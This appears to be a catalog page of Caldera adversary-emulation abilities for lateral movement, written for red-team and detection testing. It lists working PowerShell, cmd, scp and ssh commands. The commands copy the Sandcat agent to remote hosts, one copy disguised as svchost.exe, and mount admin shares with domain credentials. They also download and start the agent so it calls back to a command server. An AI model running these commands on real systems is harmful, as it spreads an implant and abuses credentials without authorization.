Caldera emulation abilities
10 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
All tactics
build-capabilities · 1 collection · 16 command-and-control · 6 credential-access · 10 defense-evasion · 15 detection · 8 discovery · 67 execution · 9 exfiltration · 13 hunt · 4 impact · 8 lateral-movement · 10 persistence · 3 privilege-escalation · 8 response · 14 setup · 10 technical-information-gathering · 1 training · 6 verification · 2
⚠
Abilities
10 shown of 10Copy 54ndc47 (SMB)
Copy 54ndc47 to remote host (SMB)
Show command
[{"platform": "windows", "executor": "psh", "command": "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n"}]Copy 54ndc47 (WinRM and SCP)
Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP
Show command
[{"platform": "windows", "executor": "psh,pwsh", "command": "$job = Start-Job -ScriptBlock {\n $username = \"#{domain.user.name}\";\n $password = \"#{domain.user.password}\";\n $secstr = New-Object -TypeName System.Security.SecureString;\n $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n $location = \"#{location}\";\n $exe = \"#{exe_name}\";\n Copy-Item $location -Destination \"C:\\Users\\Public\\svchost.exe\" -ToSession $session;\n Start-Sleep -s 5;\n Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n"}, {"platform": "darwin", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go\n"}, {"platform": "linux", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go\n"}]Copy Sandcat File using Powershell
Copy Sandcat file using PowerShell
Show command
[{"platform": "windows", "executor": "psh", "command": "$server=\"#{server}\";\n$sharePath=\"#{share}\";\nSet-Location $sharePath;$url=\"$($server)/file/download\";\n$wc=New-Object System.Net.WebClient;$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");($data=$wc.DownloadData($url)) -and\n($name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"))\n-and ([io.file]::WriteAllBytes(\"$($sharePath)$name.exe\",$data));\n$startServer=\"$($sharePath)$name.exe -server $($server) \";Invoke-Command\n-ScriptBlock {Param([string]$startServer, $sharePath, $name, $server) Invoke-WmiMethod\n-Class Win32_Process -Name Create -ArgumentList \"$($sharePath)$name.exe\n-server $server -v\" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server\n"}]Copy Sandcat File using PsExec on CMD
Copy Sandcat file using PsExec on CMD
Show command
[{"platform": "windows", "executor": "cmd", "command": "net /y use \\\\#{remote.host.name} & copy /y sandcat.go-windows\n\\\\#{remote.host.name}\\Users\\Public & #{psexec.path} -accepteula \\\\#{remote.host.name}\ncmd /c start C:\\Users\\Public\\sandcat.go-windows -server #{server} -v\n"}]
lateral-movement
[]
Lateral Movement - Certutil
Uses CertUtil as a LoL technique to move the .exe agent as a certificate using windows-signed binaries
Show command
[]
lateral-movement
[]
Lateral Movement - esentutl
Tool transfer to lateral hosts using Alternate Data Streams to hide implant
Show command
[]
Mount Share
Mount a windows share
Show command
[{"platform": "windows", "executor": "psh", "command": "net use \\\\#{remote.host.fqdn}\\C$ /user:#{domain.user.name} #{domain.user.password}\n"}]Net use
Mounts a network file share on a target computer
Show command
[{"platform": "windows", "executor": "psh", "command": "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n"}]Start 54ndc47
Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication
Show command
[{"platform": "darwin", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n"}, {"platform": "linux", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n"}]Start Agent (WinRM)
Start Agent using WinRM (WinRM)
Show command
[{"platform": "windows", "executor": "psh", "command": "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\\Users\\Public\\svchost.exe -server #{server} }};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n"}]Showing 1-10 of 10